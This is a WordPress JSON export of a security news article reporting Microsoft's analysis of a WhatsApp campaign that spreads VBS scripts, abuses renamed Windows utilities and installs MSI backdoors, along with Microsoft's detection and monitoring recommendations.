{"id":7667,"date":"2026-04-01T11:19:23","date_gmt":"2026-04-01T11:19:23","guid":{"rendered":"https:\/\/cybersecurityinfocus.com\/?p=7667"},"modified":"2026-04-01T11:19:23","modified_gmt":"2026-04-01T11:19:23","slug":"whatsapp-malware-campaign-uses-malicious-vbs-files-to-gain-persistent-access","status":"publish","type":"post","link":"https:\/\/cybersecurityinfocus.com\/?p=7667","title":{"rendered":"WhatsApp malware campaign uses malicious VBS files to gain persistent access"},"content":{"rendered":"<div>\n<div class=\"grid grid--cols-10@md grid--cols-8@lg article-column\">\n<div class=\"col-12 col-10@md col-6@lg col-start-3@lg\">\n<div class=\"article-column__content\">\n<div class=\"container\"><\/div>\n<p>Microsoft is warning WhatsApp users of a new malware campaign that tricks them into executing malicious Visual Basic Script (VBS) files, ultimately enabling persistence and remote access.<\/p>\n<p>In a March 31 <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2026\/03\/31\/whatsapp-malware-campaign-delivers-vbs-payloads-msi-backdoors\/\" target=\"_blank\" rel=\"noopener\">report<\/a>, Microsoft Defender Experts said attackers have been distributing malicious Visual Basic Script (VBS) files through WhatsApp since at least late February, relying on social engineering to get them executed.<\/p>\n<p>Once launched, the scripts run a delayed malware execution, first initiating a multi-stage infection flow designed to blend into normal system activity while working in the background to pull additional payloads for remote control. \u201cThe campaign relies on a combination of social engineering and living-off-the-land (LOTL) techniques,\u201d Microsoft researchers wrote in the report. \u201cBy combining trusted platforms with legitimate tools, the threat actor reduces visibility and increases the likelihood of successful execution.\u201d<\/p>\n<p>The campaign ultimately installs malicious Microsoft Installer (MSI) packages to maintain control of the infected devices.<\/p>\n<h2 class=\"wp-block-heading\"><a><\/a>Campaign deploys a LOTL infection chain<\/h2>\n<p>The attack begins with a WhatsApp message carrying a VBS file. Once executed, the script creates hidden directories on the system and begins staging the next steps of the compromise.<\/p>\n<p>However, rather than dropping the custom malware immediately, the campaign moves to living-off-the-land techniques. The VBS payload deploys renamed versions of legitimate Windows utilities, such as curl.exe and bitsadmin.exe, disguised under misleading filenames to evade casual inspection.<\/p>\n<p>These binaries retain their original metadata, but their altered names allow them to blend into the environment while performing malicious tasks like downloading additional payloads. \u201cMicrosoft Defender and other security solutions can leverage this metadata discrepancy as a detection signal, flagging instances where a file\u2019s name does not match its embedded OriginalFileName,\u201d the report added.<\/p>\n<p>The researchers noted that even payload retrieval happens from legitimate hosting sources. Attackers host components on well-known cloud platforms, including AWS, Tencent Cloud, and Blackblaze B2. Use of these trusted tools, trusted infrastructure, and staged execution was flagged as a reason for this being a low-noise, reliable attack path.<\/p>\n<h2 class=\"wp-block-heading\"><a><\/a>MSI as the backdoor vehicle for persistence<\/h2>\n<p>The final stages of the campaign lead to <a href=\"https:\/\/www.csoonline.com\/article\/2156359\/fortinet-ivanti-zero-day-victims-face-evolved-persistence-by-the-espionage-actor.html\">persistence<\/a>, using Microsoft Installer (MSI) packages as the delivery mechanism for backdoors.<\/p>\n<p>MSI files are an effective choice as they are not usually treated as inherently suspicious and can <a href=\"https:\/\/www.cybereason.com\/blog\/threat-analysis-msi-masquerading-as-software-installer\" target=\"_blank\" rel=\"noopener\">execute<\/a> custom actions during installation. In this campaign, they are used to deploy malware that maintains access, escalates privileges, and enables <a href=\"https:\/\/www.csoonline.com\/article\/4151203\/attackers-exploit-critical-langflow-rce-within-hours-as-cisa-sounds-alarm.html\">remote control<\/a> of infected systems.<\/p>\n<p>By the time the MSI component is installed, the attackers have already established a foothold using scripts and system tools, making the backdoor just one layer in a broader persistence strategy found by Microsoft. The earlier stages ensure the environment is prepared, while the installer formalizes long-term access.<\/p>\n<p>Microsoft also noted that the campaign incorporates privilege escalation to strengthen persistence, enabling malware to run with elevated privileges and maintain access beyond the initial user-level compromise. Recommendations included monitoring scripts and installer execution, watching for misuse of legitimate tools, and tracking suspicious activity tied to files delivered through platforms like WhatsApp.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>Microsoft is warning WhatsApp users of a new malware campaign that tricks them into executing malicious Visual Basic Script (VBS) files, ultimately enabling persistence and remote access. In a March 31 report, Microsoft Defender Experts said attackers have been distributing malicious Visual Basic Script (VBS) files through WhatsApp since at least late February, relying on [&hellip;]<\/p>\n","protected":false},"author":0,"featured_media":7668,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-7667","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-education"],"_links":{"self":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/7667"}],"collection":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7667"}],"version-history":[{"count":0,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/7667\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/media\/7668"}],"wp:attachment":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7667"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7667"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7667"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}